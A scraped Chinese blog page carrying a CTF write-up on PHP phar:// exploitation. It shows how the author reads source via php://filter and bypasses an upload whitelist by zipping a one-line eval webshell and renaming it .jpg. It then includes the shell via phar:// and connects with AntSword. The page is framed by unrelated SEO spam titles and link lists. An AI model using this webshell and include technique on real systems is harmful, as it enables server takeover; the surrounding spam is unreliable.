当前位置: 首页 > news >正文

www开头网站怎么做关键词优化seo优化排名

news 2025/7/7 12:22:08
www开头网站怎么做,关键词优化seo优化排名,web网页设计心得体会,合成版本传奇手游一.phar协议 用于将多个 PHP 文件、类、库、资源(如图像、样式表)等打包成一个单独的文件。这个归档文件可以像其他 PHP 文件一样被包含(include)或执行。PHAR 归档提供了一种方便的方式来分发和安装 PHP 应用程序和库&#xff0c…

一.phar协议

用于将多个 PHP 文件、类、库、资源(如图像、样式表)等打包成一个单独的文件。这个归档文件可以像其他 PHP 文件一样被包含(include)或执行。PHAR 归档提供了一种方便的方式来分发和安装 PHP 应用程序和库,尤其是当它们包含许多文件和目录时

1.格式

将一句话木马(shell.php)压缩成压缩包形式(shell.zip),将压缩包后缀改为.jpg(shell.jpg)

phar://shell.jpg/shell.php

2.实操

点击题目链接,空白页面,查看源代码,发现include.php
在这里插入图片描述
include.php的源代码,有一个upload.php,且告诉参数是file
在这里插入图片描述
访问upload,是文件上传页面,上传木马文件发现不行
在这里插入图片描述
通过php://fifter,查看upload.php和include.php的源代码,(php伪协议)

?file=php://filter/read=convert.base64-encode/resource=include.php发现报错,分析报错原因,知道它强制加后缀.php,这样图片马就上传不了

在这里插入图片描述

?file=php://filter/read=convert.base64-encode/resource=include

在这里插入图片描述
base64解码在这里插入图片描述代码分析,过滤了http|data|ftp|input|%00等字样,还强制在后缀加.php

<html>
Tips: the parameter is file! :) 
<!-- upload.php -->
</html>
<?php@$file = $_GET["file"];if(isset($file)){if (preg_match('/http|data|ftp|input|%00/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=70){echo "<p> error! </p>";}else{include($file.'.php');}}
?>

同样方法得到upload.php

代码分析,只是一个白名单过滤,对文件的后缀和文件类型进行判断

<form action="" enctype="multipart/form-data" method="post" 
name="upload">file:<input type="file" name="file" /><br> 
<input type="submit" value="upload" /></form><?php
if(!empty($_FILES["file"]))
{echo $_FILES["file"];$allowedExts = array("gif", "jpeg", "jpg", "png");@$temp = explode(".", $_FILES["file"]["name"]);$extension = end($temp);if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")|| (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")|| (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))&& (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts)){move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);echo "file upload successful!Save in:  " . "upload/" . $_FILES["file"]["name"];}else{echo "upload failed!";}
}
?>

上传shell.jpg,这个文件是shell.php压缩后,将.zip后缀改为.jpg后缀shell.php内容:<?php @eval($_POST[c]);?>

payload:
http://hazelshishuaige.club:8040/include.php?file=phar://upload/shell.jpg/shell

在这里插入图片描述
蚁剑连接
在这里插入图片描述flag在根目录下
在这里插入图片描述

http://www.hengruixuexiao.com/news/9112.html

相关文章:

  • 做网站准备郑州靠谱seo整站优化
  • 如何在年报网站上做遗失公告百度关键词怎么做排名
  • 做ui的图从哪个网站找谷歌关键词查询工具
  • 阿里云搭建企业网站推广策划方案怎么写
  • 学校网站建设策划书百度快速排名工具
  • 模板网站制作公司appstore关键词优化
  • wordpress控制文章显示爱站网seo查询
  • 百度打网站名称就显示 如何做代运营
  • 小米网站开发语言营销渠道的三个类型
  • 做的漂亮的商务网站百度指数官网
  • 做淘宝客网站好搭建吗?微信朋友圈广告30元 1000次
  • 学术网站怎么做营销型网站建设论文
  • 郑州做网站企业汉狮网页搜索引擎优化技术
  • 黑白高端网站建设网络推广工具和方法
  • 网站建设0基础学起营销模式有几种
  • 自学网站查分数重庆店铺整站优化
  • 公司的网站建设价格seo优化报价
  • 开锁都在什么网站做app制作一个需要多少钱
  • 专业做网站平台优化大师app下载安装
  • 拼多多网站南昌网站优化公司
  • 东昌府网站建设公司推广计划方案模板
  • wifi网络服务商电话杭州排名优化公司电话
  • 厦门网站建设外包公司百度seo快速排名优化服务
  • 移动网站 案例小学生简短小新闻
  • 文化推广网站建设心得seo这个行业怎么样
  • 全国疫情最新公告搜索引擎优化的重要性
  • 免费生成网站的app广州seo网站营销
  • 南宁怎么做seo团队seo手机排名软件
  • 网站建设实训目的香港旺道旺国际集团
  • 企业网站建设哪里做网站好电商平台开发需要多少钱